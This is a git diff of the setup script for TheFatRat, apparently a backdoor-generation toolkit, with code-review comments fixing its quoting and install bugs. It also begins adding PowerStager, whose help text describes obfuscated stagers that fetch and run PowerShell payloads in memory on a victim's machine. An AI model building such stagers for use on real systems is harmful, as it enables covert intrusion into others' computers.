@@ -433,43 +566,16 @@ which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Mingw32 Compiler..................[ found ]" which i586-mingw32msvc-gcc >> $log 2>&1 -sleep 2 +sleep 1 else echo -e $red "[ X ] mingw32 compiler -> not found " echo -e $yellow "[ ! ] Installing Mingw32 " xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 --force-yes -y" -which i586-mingw32msvc-gcc > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Done installing .... " which i586-mingw32msvc-gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Mingw32 -> OK" else -echo -e $red "It was not possible to detect i586-mingw32msvc-gcc installed in your system ." -echo -e $yellow "One of these problems occured :" -echo "" -echo -e $blue "- Instalation from kali repository on your system failed" -echo "" -echo -e $blue "- You have a faulty installation of mingw32 in your system -(try : $green apt-get remove --purge mingw32 mingw-w64 -y && apt-get install -f -$blue and run setup again in fatrat folder ." -echo "" -echo -e $blue "- Your system is 32bit and you recently added into dpkg arch:x64 for some reason" -echo "" -echo -e $blue "- /usr/bin folder is not on your system path (not likely)" -echo "" -echo -e $yellow "Please report into issues on Fatrat github this error : ($arch)" -echo "" -echo -e $green "Press any key to continue" -read abo -echo -e $blue "Reactivating you original repositories" -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.backup /etc/apt/sources.list -#now we can remove the emergency backup securely -rm -f /etc/apt/sources.list.fatrat -apt-get clean -xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " -clear -exit 0 +echo "0" > $stp fi fi ;; 
@@ -492,74 +598,133 @@ exit 0 esac #Adding Dx & Aapt path to config -which aapt > /dev/null 2>&1 +which dx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $red "[ X ] Aapt..........................." - -# Removing current installed aapt version on user system and setting aapt 25.0.2 in thirdparty tools -# This must be done because apktool 2.2.2 will conflict with an old aapt version on building apk files -# Aapt is not a variable that could be set automatically , calls to aapt are made by apktool internally -xterm -T "☣ Removing Your Current Aapt ☣" -geometry 100x30 -e "sudo apt-get remove --purge aapt -y" >>$log 2>&1 -unlink /usr/local/sbin/aapt > /dev/null 2>&1 -unlink /usr/bin/aapt > /dev/null 2>&1 -ln -s $path/tools/android-sdk/aapt /usr/local/sbin/aapt > /dev/null 2>&1 -echo -e $green "[ ✔ ] Dx & Aapt" -echo "$path/tools/android-sdk/dx" >> $log 2>&1 -echo "$path/tools/android-sdk/dx" | tee -a $config >> /dev/null 2>&1 -echo "$path/tools/android-sdk/aapt" >> $log 2>&1 -echo "$path/tools/android-sdk/aapt" | tee -a $config >> /dev/null 2>&1 -sleep 2 +dxg=`dx --version 2>&1 | tee temp/dx` +dxv=`cat temp/dx | awk '{print $3}'` +case $dxv in +1.8) +rm -rf temp/dx >/dev/null 2>&1 +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" +;; +*) +xterm -T "☣ Removing Your Current DX ☣" -geometry 100x30 -e "sudo apt-get remove --purge dx -y" >>$log 2>&1 +ln -s "$path/tools/android-sdk/dx" "/usr/local/sbin/dx" > /dev/null 2>&1 +which dx > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" else -echo -e $green "[ ✔ ] Dx & Aapt" -echo "$path/tools/android-sdk/dx" >> $log 2>&1 -echo "$path/tools/android-sdk/dx" | tee -a $config >> /dev/null 2>&1 -echo "$path/tools/android-sdk/aapt" >> $log 2>&1 -echo "$path/tools/android-sdk/aapt" | tee -a $config >> /dev/null 2>&1 -ln -s $path/tools/android-sdk/aapt /usr/local/sbin/aapt > /dev/null 2>&1 -sleep 2 +echo -e $red "[ x ] DX 1.8" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/android-sdk/dx" "/usr/local/sbin/dx" > /dev/null 2>&1 +which dx > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" +else +echo -e $red "[ x ] DX 1.8" +echo "0" > $stp +fi fi +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +aptv=`aapt v | awk '{print $5}'` +case $aptv in +v0.2-3821160) +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +;; +*) +xterm -T "☣ Removing Your Current Aapt ☣" -geometry 100x30 -e "sudo apt-get remove --purge aapt -y" >>$log 2>&1 +ln -s "$path/tools/android-sdk/aapt" "/usr/local/sbin/aapt" > /dev/null 2>&1 +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +else +echo -e $red "[ x ] Aapt v0.2-3821160" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/android-sdk/aapt" "/usr/local/sbin/aapt" > /dev/null 2>&1 +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +else +echo -e $red "[ x ] Aapt v0.2-3821160" +echo "0" > $stp +fi +fi #Adding Apktool path to config +which apktool > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +apk=`apktool | sed -n 1p | awk '{print $2}'` > /dev/null 2>&1 +case $apk in +v.2.2.2) +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Apktool v.2.2.2" +;; +*) xterm -T "☣ REMOVE OLD APKTOOL ☣" -geometry 100x30 -e "sudo apt-get remove --purge apktool -y" -echo -e $green "[ ✔ ] Apktool 2.2.2 " -echo "$path/tools/apktool2.2.2/apktool" >> $log 2>&1 -echo "$path/tools/apktool2.2.2/apktool" | tee -a $config >> /dev/null 2>&1 -unlink /usr/local/sbin/apktool > /dev/null 2>&1 -unlink /usr/bin/apktool > /dev/null 2>&1 -ln -s $path/tools/apktool2.2.2/apktool /usr/local/sbin/apktool > /dev/null 2>&1 -sleep 2 +ln -s "$path/tools/apktool2.2.2/apktool" "/usr/local/sbin/apktool" > /dev/null 2>&1 +which apktool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Apktool v.2.2.2" +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +else +echo -e $red "[ x ] Apktool v.2.2.2" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/apktool2.2.2/apktool" "/usr/local/sbin/apktool" > /dev/null 2>&1 +which apktool > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Apktool v.2.2.2" +else +echo -e $red "[ x ] Apktool v.2.2.2" +echo "0" > $stp +fi +fi -# Removing current installed dex2jar version on user system and setting dex2jar in thirdparty tools -# Current kali repo uses version 0.95 version while dex2jar it is already in 2.0 version -echo -e $green "[ * ] Removing any old installed version from dex2jar from your system" -sleep 2 -xterm -T "☣ Removing Your Current Dex2Jar ☣" -geometry 100x30 -e "sudo apt-get remove --purge dex2jar -y" >>$log 2>&1 -unlink /usr/local/sbin/d2j-baksmali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jar2dex > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jar2jasmin > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jasmin2jar > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-smali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 -unlink /usr/bin/d2j-baksmali > /dev/null 2>&1 -unlink /usr/bin/d2j-dex-recompute-checksum > /dev/null 2>&1 -unlink /usr/bin/d2j-dex2jar > /dev/null 2>&1 -unlink /usr/bin/d2j-dex2smali > /dev/null 2>&1 -unlink /usr/bin/d2j-jar2dex > /dev/null 2>&1 -unlink /usr/bin/d2j-jar2jasmin > /dev/null 2>&1 -unlink /usr/bin/d2j-jasmin2jar > /dev/null 2>&1 -unlink /usr/bin/d2j-smali > /dev/null 2>&1 -unlink /usr/bin/d2j-std-apk > /dev/null 2>&1 -rm /usr/bin/d2j-* > /dev/null 2>&1 -rm /usr/sbin/d2j-* > /dev/null 2>&1 -rm /usr/local/bin/d2j-* > /dev/null 2>&1 -rm /usr/local/sbin/d2j-* > /dev/null 2>&1 -echo -e $green "[ * ] Manually Installing Dex2Jar 2.0 " +which d2j-dex2jar > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +dex=`d2j-dex2jar 2>&1 | tee temp/dex` +d2j=`cat temp/dex | sed -n 19p | awk '{print $2}' | cut -f1 -d','` +case $d2j in +reader-2.0) +rm -rf temp/dex >/dev/null 2>&1 +which d2j-dex2jar >> $log 2>&1 +echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Dex2Jar 2.0" +;; +*) +rm -rf temp/dex >/dev/null 2>&1 +xterm -T "☣ Removing Your Current Dex2Jar ☣" -geometry 100x30 -e "sudo apt-get remove --purge dex2jar --force-yes -y" cp $path/tools/dex2jar/* /usr/local/sbin/ > /dev/null 2>&1 -chmod +x /usr/local/sbin/d2j-baksmali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-baksmali" > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 
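Review bot: `chmod +x /usr/local/sbin/d2j-baksmali" > /dev/null 2>&1` at the end of this hunk has an unmatched `"`; bash treats everything up to the next `"` — the `cp -r $path/tools/dex2jar/lib "/usr/local/share/dex2jar/lib` line in the following hunk — as a single quoted argument, so the remaining `chmod`, `rm -rf`, `mkdir` and `cp -r` commands never run and the lib directory is never installed. The fix is to drop both stray quotes: `chmod +x /usr/local/sbin/d2j-baksmali > /dev/null 2>&1` and `cp -r "$path/tools/dex2jar/lib" /usr/local/share/dex2jar/lib > /dev/null 2>&1`; the same pair is repeated in the else branch of the next hunk. Separately, the new dx/aapt/apktool branches replaced the old `unlink` calls with a bare `ln -s` into `/usr/local/sbin`, so a link left by a previous run makes `ln -s` fail silently and the following `which` check may then report the stale target as OK; `ln -sf` restores the old behaviour. `dxg` is assigned but never read, and `dx --version 2>&1 | tee temp/dx` plus `cat temp/dx` collapses to `dxv=$(dx --version 2>&1 | awk '{print $3}')` with no temp file.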
@@ -570,152 +735,43 @@ chmod +x /usr/local/sbin/d2j-smali > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 rm -rf /usr/local/share/dex2jar > /dev/null 2>&1 mkdir /usr/local/share/dex2jar > /dev/null 2>&1 -cp -r $path/tools/dex2jar/lib /usr/local/share/dex2jar/lib > /dev/null 2>&1 +cp -r $path/tools/dex2jar/lib "/usr/local/share/dex2jar/lib > /dev/null 2>&1 which d2j-dex2jar > /dev/null 2>&1 if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Dex2Jar 2.0" which d2j-dex2jar >> $log 2>&1 echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 -echo -e $green "[ ✔ ] Dex2Jar 2.0 Installed " -sleep 2 else -echo -e $red "" -echo "There was an issue installing dex2jar in your system , aborting" -sleep 2 -exit 1 +echo -e $red "[ x ] Dex2Jar 2.0" +echo "0" > $stp fi - -# check if metasploit-framework its installed -which msfconsole > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Metasploit-Framework..............[ found ]" -echo "msfconsole" | tee -a $config $log >> /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log >> /dev/null 2>&1 -sleep 2 -else -echo "" -echo -e $red "[ X ] metasploit-framework -> not found " - -# Providing manual input to user in case metasploit was installed from git and is not on system path - -q1=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Metasploit path manually" FALSE "Install Metasploit from Repository" FALSE "Use default config" --text="`printf "Metasploit-Framework was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q1 in - -"Setup Metasploit path manually") - -minpm=$(zenity --entry --title="Metasploit Path Manual Input" --width=100 --height=100 --text="Write the location of your Metasploit Path?" --entry-text="/opt/metasploit-framework"); -ret=$? 
- -if [ $ret = "0" ]; then -#Creation of symlinks to metasploit manual path in /usr/local/sbin to avoid changes in fatrat scripts - -unlink /usr/local/sbin/msfconsole > /dev/null 2>&1 -unlink /usr/local/sbin/msfvenom > /dev/null 2>&1 -ln -s $minpm/msfconsole /usr/local/sbin/msfconsole > /dev/null 2>&1 -ln -s $minpm/msfvenom /usr/local/sbin/msfvenom > /dev/null 2>&1 -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -fi - -if [ $ret = "1" ]; then -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Metasploit from Repository") -echo -e $yellow "[ ! ] Installing Metasploit-Framework " -xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -;; -"Use default config")cd -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 ;; esac -fi -# Check if backdoor-factory exists - -which backdoor-factory > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Backdoor-Factory..................[ found ]" -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -sleep 2 else -echo -e $red "[ X ] backdoor-factory -> not found " -echo "" - -q2=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Backdoor-Factory path manually" FALSE "Install Backdoor-Factory from Repository" FALSE "Use default config" --text="`printf "Backdoor-Factory was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q2 in - -"Setup Backdoor-Factory path manually") -minpb=$(zenity --entry --title="Backdoor-Factory Path Manual Input" --width=100 --height=100 --text="Write the location of your Backdoor-Factory Path?" 
--entry-text="/opt/backdoor-factory/backdoor.py"); -ret=$? - -if [ $ret = "0" ]; then -echo "python2 $minpb" | tee -a $config $log > /dev/null 2>&1 -fi - -if [ $ret = "1" ]; then -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Backdoor-Factory from Repository") -echo -e $yellow "[ ! ] Installing backdoor-factory " -xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -;; - -"Use default config") -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -;; -esac -fi -# check if searchsploit exists - -which searchsploit > /dev/null 2>&1 +cp $path/tools/dex2jar/* /usr/local/sbin/ > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-baksmali" > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jar2dex > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jar2jasmin > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jasmin2jar > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-smali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 +rm -rf /usr/local/share/dex2jar > /dev/null 2>&1 +mkdir /usr/local/share/dex2jar > /dev/null 2>&1 +cp -r $path/tools/dex2jar/lib "/usr/local/share/dex2jar/lib > /dev/null 2>&1 +which d2j-dex2jar > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then -echo -e $green "[ ✔ ] Searchsploit......................[ found ]" -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Dex2Jar 2.0" +which d2j-dex2jar >> $log 2>&1 +echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 else -echo -e $red "[ X ] searchsploit -> not found" -echo "" -q3=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Searchsploit path manually" FALSE "Install Searchsploit from Repository" FALSE "Use default config" --text="`printf "Searchsploit was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q3 in - -"Setup Searchsploit path manually") -minpc=$(zenity --entry --title="Searchsploit Path Manual Input" --width=100 --height=100 --text="Write the location of your Searchsploit Path?" --entry-text="/opt/searchsploit/searchsploit"); -ret=$? - -if [ $ret = "0" ]; then -echo "bash $minpc" | tee -a $config $log > /dev/null 2>&1 +echo -e $red "[ x ] Dex2Jar 2.0" +echo "0" > $stp fi - -if [ $ret = "1" ]; then -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Searchsploit from Repository") -echo -e $yellow "[ ! ] Installing searchsploit " -xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -sleep 2 -echo "" -echo -e $green "Configuration and tool installed with success!"; -sleep 2 -;; - -"Use default config") -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -;; -esac fi +mtspl ################################ # rebackyo repo 
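Review bot: The `else` branch added here repeats the entire dex2jar install sequence from the preceding hunk verbatim (the `cp`, nine `chmod +x` lines, `rm -rf`/`mkdir`, `cp -r` and the `which` check), including both stray `"` characters (`chmod +x /usr/local/sbin/d2j-baksmali"` and `cp -r ... "/usr/local/share/dex2jar/lib`), so the quoting bug has to be fixed in two places. Pulling the sequence into one helper called from both the `*)` arm and this `else` branch removes the duplication and the second copy of the bug. `mtspl` replaces the removed metasploit/backdoor-factory/searchsploit detection, but its definition does not appear in this diff, so it cannot be confirmed here that it records failures to `$stp` the way the branches above do. The enclosing function begins before this diff's first hunk and is closed by the `}` in the last setup.sh hunk.
```shell
function install_dex2jar() {
cp "$path"/tools/dex2jar/* /usr/local/sbin/ > /dev/null 2>&1
chmod +x /usr/local/sbin/d2j-* > /dev/null 2>&1
rm -rf /usr/local/share/dex2jar > /dev/null 2>&1
mkdir /usr/local/share/dex2jar > /dev/null 2>&1
cp -r "$path/tools/dex2jar/lib" /usr/local/share/dex2jar/lib > /dev/null 2>&1
# … unchanged: which d2j-dex2jar check, $log/$config append, "0" > $stp on failure …
}
```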
@@ -728,20 +784,27 @@ rm -f /etc/apt/sources.list.fatrat apt-get clean xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " clear +echo -e $okegreen "Do you want to create a shortcut for fatrat in your system" +echo -e $okegreen "so you can run fatrat from anywhere in your terminal ?" +echo "" +echo -ne $cyan "Choose y/n : " +read cho +case $cho in -zenity --width=100 --height=100 --no-wrap --title="FatRat Shorcut Creation" --question --ok-label="Yes" --cancel-label="No" --text="`printf "Do you wish to create a fatrat shortcut in your system path ? \n So you can call fatrat from anywhere in terminal ."`"; +y|Y|Yes|yes|YES) lnk=$? if [ $lnk == "0" ];then dir=`pwd` scrp="cd $dir && ./fatrat" -rm -f /usr/local/sbin/fatrat >/dev/null 2>&1 -touch /usr/local/sbin/fatrat >/dev/null 2>&1 +rm -f /usr/local/sbin/fatrat +touch /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat chmod +x /usr/local/sbin/fatrat chmod +x fatrat chmod +x update chmod +x backdoor_apk +chmod +x $path/tools/power.py chmod +x $path/tools/android-sdk/zipalign chmod +x $path/tools/proguard5.3.2/lib/proguard chmod +x $path/tools/android-sdk/dx 
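Review bot: `lnk=$?` followed by `if [ $lnk == "0" ];then` is a leftover from the zenity dialog this hunk removes; inside the `y|Y|Yes|yes|YES)` arm `$?` is the status of the preceding `read cho`, which is 0 whenever a line was read, so the `if` is always taken and the `lnk` check no longer decides anything. Drop `lnk=$?` and the `if`/`fi` around the shortcut creation (the matching `fi` is in the next hunk). The wrapper written to `/usr/local/sbin/fatrat` interpolates the checkout directory unquoted via `echo $scrp`, so a path containing spaces produces a broken `cd`; `printf 'cd %q && ./fatrat\n' "$dir" >> /usr/local/sbin/fatrat` writes a correctly quoted line. The `case $cho` opened here is closed by the `esac` in the next hunk.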
@@ -749,22 +812,245 @@ chmod +x $path/tools/android-sdk/aapt chmod +x $path/tools/apktool2.2.2/apktool which fatrat >> $log 2>&1 clear -zenity --info --width=100 --height=100 --no-wrap --text="FatRat shorcut created , write (fatrat) anywhere in terminal to open it ." -sleep 2 -echo -e $green "Instalation completed" -exit +echo "" +echo -e $green "Instalation completed , To execute fatrat write anywhere in your terminal (fatrat)" fi -if [ $lnk == "1" ];then +;; + +n|no|No|NO) chmod +x fatrat chmod +x update chmod +x backdoor_apk +chmod +x $path/tools/power.py chmod +x $path/tools/android-sdk/zipalign chmod +x $path/tools/proguard5.3.2/lib/proguard chmod +x $path/tools/android-sdk/dx chmod +x $path/tools/android-sdk/aapt chmod +x $path/tools/apktool2.2.2/apktool -zenity --width=100 --height=100 --no-wrap --info --text="To execute fatrat write in fatrat directory (./fatrat) to execute it." -sleep 2 -echo -e $green "Instalation completed" +clear +echo "" +echo -e $green "Instalation completed , To execute fatrat write in fatrat directory (./fatrat)" +;; + +*) +chmod +x fatrat +chmod +x update +chmod +x backdoor_apk +chmod +x $path/tools/power.py +chmod +x $path/tools/android-sdk/zipalign +chmod +x $path/tools/proguard5.3.2/lib/proguard +chmod +x $path/tools/android-sdk/dx +chmod +x $path/tools/android-sdk/aapt +chmod +x $path/tools/apktool2.2.2/apktool +clear +echo "" +echo -e $green "Instalation completed , To execute fatrat write in fatrat directory (./fatrat)" +;; +esac +exit + +} + +function chknet() { +echo -e $red "[X] Your Internet is not working correctly!" +sleep 1 +echo -e $cyan "[*] Checking ...." +ping -c 1 8.8.4.4 > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] +then + echo -e $red "[X] Your linux OS is not able to resolve" + echo -e $red "hostnames over terminal using ping !!" 
+ echo "" + echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" +echo "" +echo -e $green "Setup will continue , but is not garantee that apt package management +may work properly , or even if it can resolve hostnames ." +echo "" +echo -e $cyan "Setup will continue because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS = Success" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +cont + sleep 1 +elif [ $png == "1" ] +then + echo -e $yellow "You are connected to your local network but not to the web ." + echo -e $yellow "Check if your router/modem gateway is connected to the web ." +echo "" +echo -e $green "Setup will not continue , you are only connected to your local lan." +echo "" +echo -e $cyan "Setup will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 +sleep 1 +elif [ $png == "2" ] +then +echo -e $red "You are not connected to any network ." +echo "" +echo -e $cyan "Setup will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 + sleep 1 +fi +} + +# setup.sh Original Author : Edo maland ( Screetsec ) +# Script rebuilded by peterpt +# Install all dependencies nedded +# configuration all file for fixing all problems +# -------------------------------------------------------- + + +#Fail safe for original user sources.list in case setup was interrupted in middle last time +file="/etc/apt/sources.list.fatrat" +if [ -f "$file" ] +then +echo "Setup Detected that your previous run was interrupted in middle , fixing your original repositories list ." +sleep 4s +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.fatrat /etc/apt/sources.list +echo "Your Original repository list was recovered. 
;) ..... beginning setup" +echo "" +echo "Cleaning previous repositories cache & updating your repository ." +sudo apt-get clean && apt-get update -y +sleep 2 +else +echo "" +fi +path=`pwd` +arch=`uname -m` +log=$path/logs/setup.log +config=$path/config/config.path +fail=$path/logs/failsetup.log +cfg=$path/config/config.path +#Removing any previous setup log created +rm -rf $log > /dev/null 2>&1 +rm -rf logs/check > /dev/null 2>&1 + +#This colour +cyan='\e[0;36m' +green='\e[0;32m' +lightgreen='\e[0;32m' +white='\e[0;37m' +red='\e[0;31m' +yellow='\e[0;33m' +blue='\e[0;34m' +purple='\e[0;35m' +orange='\e[38;5;166m' +path=`pwd` + +#Check root dulu +if [ $(id -u) != "0" ]; then +echo -e $red [x]::[not root]: You need to be [root] to run this script.; + echo "" + sleep 1 +exit 0 +fi +echo "" +echo -e $green "[ * ] Fixing any possible broken packages in apt management" +sleep 1 +sudo apt-get install -f -y && sudo apt-get autoremove -y +sleep 1 +echo "[ ✔ ] Done ! ....Proceeding with setup" +sleep 2 +resize -s 80 103 > /dev/null 2>&1 +clear +rm -rf $fail >/dev/null 2>&1 +touch $fail +#Banner dong biar keren +echo -e $green "" +echo "___________ __ __________ __ " +echo "\_ _____/_____ _/ |_\______ \_____ _/ |_ " +echo " | __) \__ \ \ __\| _/\__ \ \ __\ " +echo " | \ / __ \_| | | | \ / __ \_| | " +echo " \___ / (____ /|__| |____|_ /(____ /|__| " +echo " \/ \/ \/ \/ " +echo " ____ ________ " +echo " /_ | / __ \ " +echo " | | \____ / " +echo " | | / / " +echo " |___| /\ /____/ " +echo " \/ " +echo "" +echo -e $blue " Setup Script for FATRAT 1.9.4 " +touch $log +echo "------------------------------------------------------" >> $log +echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log +echo "------------------------------------------------------" >> $log +echo " " >> $log +echo "" +case $arch in +x86_64|aarch64) +echo -e $purple " 64Bit OS detected" +echo "" +;; +i386|i486|i586|i686|armv7l) +echo -e $blue " 32Bit OS detected" +echo "" +;; +*) +echo -e $red 
"Setup will not proceed because none of these archs were detected" +echo "" +echo -e $blue "x86_64|i386|i486|i586|i686|aarch64|armv7l" +echo "" +echo -e $green "Report this arch: $blue $arch $green into fatrat issues on github" +echo "" +echo -e "Press any key to continue" +read abor +exit 0 +;; +esac +echo -e $green "Checking type of shell ...." +sleep 1 + +#Check if user is using a remote shell or a local terminal +if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then + echo "[remote]" +echo "" + echo -e $red "Fatrat & Setup does not work over a remote secure shell ." + echo "" +echo -e $green "If you want to Install Fatrat on a remote computer then " +echo -e $green "use a remote desktop connection like (rdesktop) or (vnc) " +echo "" +echo -e $green "Press [ENTER] key to exit" +read abor +exit 1 +else +echo [local] + case $(ps -o comm= -p $PPID) in + sshd|*/sshd) SESSION_TYPE=remote/ssh;; + esac +fi + +sleep 1 +echo -e $green "[ * ] Checking for internet connection" +sleep 1 +ping -c 1 google.com > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] +then + echo -e $green [ ✔ ]::[Internet Connection]: CONNECTED!; + sleep 1 + cont +elif [ $png == "1" ] +then + echo -e $yellow [ X ]::[Internet Connection]: LOCAL ONLY!; + chknet + sleep 1 +elif [ $png == "2" ] +then +echo -e $red [ X ]::[Internet Connection]: OFFLINE!; +chknet + sleep 1 fi -exit diff --git a/tools/power.py b/tools/power.py new file mode 100755 index 0000000..f8069c6 --- /dev/null +++ b/tools/power.py 
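Review bot: The root check added in this hunk, `if [ $(id -u) != "0" ]; then ... exit 0`, exits with status 0 on a failed precondition, so a wrapper or automation running `./setup.sh` cannot tell the refusal from success; it should be `exit 1`, matching the `exit 1` the remote-shell and offline branches already use. In `chknet`, the `sleep 1` after each `exit 1` is unreachable, and the `elif [ $png == "1" ]` / `== "2"` branches present ping's exit status as "local network only" versus "no network", which ping does not guarantee — status 1 only means no reply was received (ICMP may be filtered), so the messages should be hedged or the condition replaced by something the code actually measures. The three `case $cho` arms repeat the same nine `chmod +x` lines; hoisting them above the `case` leaves each arm with only its message. `path=\`pwd\`` is assigned twice and `SESSION_TYPE` is set but never read.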
@@ -0,0 +1,879 @@ +#!/usr/bin/env python3 +import os +import sys +import getopt +import string +import random +import base64 +import hashlib + +# Help notes and description +help_notes = """ + PowerStager 0.2 + --------------- + Created by: z0noxz + https://github.com/z0noxz/powerstager + + Description: + This script creates an executable stager that downloads a selected powershell + payload, loads it into memory and executes it using obfuscated EC methods. + The script will also encrypt the stager for dynamic signatures and some + additional obfuscation. + + This enables the actual payload to be executed indirectly without the victim + downloading it, only by executing the stager. The attacker can then for + example implement evasion techniques on the web server, hosting the payload, + instead of in the stager itself. + + Additional methods allows the payload to be embedded into the 'stager' and + temporarily stored encrypted on disk for memory injection. + + Not only are powershell powerful when managing Windows, it's also powerful + when exploiting Windows. This script 